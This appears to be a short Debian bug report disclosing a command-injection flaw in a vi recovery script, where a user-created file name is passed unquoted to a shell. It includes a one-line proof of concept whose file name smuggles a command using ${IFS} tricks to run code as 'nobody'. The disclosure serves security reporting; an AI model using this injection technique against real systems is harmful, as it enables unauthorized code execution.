Control: tags -1 + security * Adam M. Costello <bug.amc...@nicemice.net>, 2014-11-15, 20:47:
(su - nobody -s /bin/sh -c "$SENDMAIL $owner < $i" &) </dev/null >/dev/null 2>&0
Note that "$i" is a name of a file any user can create. This allows executing arbitrary code as user "nobody".
PoC exploit:
$ echo 'X-vi-recover-path: /etc/fstab' >
'/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'
--
Jakub Wilk
